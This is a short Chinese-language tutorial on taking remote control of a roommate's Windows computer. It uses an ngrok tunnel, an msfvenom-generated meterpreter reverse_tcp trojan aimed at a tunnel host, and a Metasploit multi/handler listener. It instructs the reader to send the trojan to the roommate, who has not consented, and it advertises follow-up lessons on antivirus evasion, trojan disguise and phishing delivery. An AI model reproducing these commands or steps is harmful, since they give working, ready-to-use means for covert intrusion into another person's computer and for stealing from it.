用metasploit映射公网远程控制舍友电脑

用metasploit映射公网远程控制舍友电脑

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。

实验原理：用metasploit制作木马，发送到目标主机上，双击运行后反向连接到ngrok监听的端口，由ngrok指定的端口传输到kali监听的端口，从而控制目标主机

1. 打开kali
2. 下载sunny，网址www.ngrok.cc,注册后

 

 

 

 

 

 

免费购买一个tcp连接的服务器隧道，

 

 

 

 

 

 

保存好自己的隧道id，第四步会用到

1. https://www.ngrok.cc/download.html，下载对应的sunny（ngrok客户端），比如我的kali是64位的，就下载64位的

    

    

查看kali处理器架构使用命令：arch

 

 

 

 

 

 

 

4，

切换到sunny所在的目录，输入chmod 777 ./* 对当前文件夹的文件加上权限，再输入./sunny clientid [先前保存的id]，启动映射隧道

 

 

 

 

 

 

 

 

1. 新建一个终端窗口，进入超级管理员权限，msfvenom -p windows/meterpreter/reverse_tcp lhost=vipgz6.91tunnel.com lport=10663 -f exe > shell.exe
2. 将生成的木马传给舍友，

    

    

目前我们先不考虑对木马的伪装以及免杀

1. kali打开msfconsole，输入以下命令：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 6666

exploit

 

 

 

7.双击舍友电脑上的木马，成功上线

 

 

 

8.查看他的ip

 

 

 

 

 

 

1. 验证一下吧
2. 拿下！

免杀和木马伪装以及如何钓鱼将木马发送给舍友请关注qq群后续分享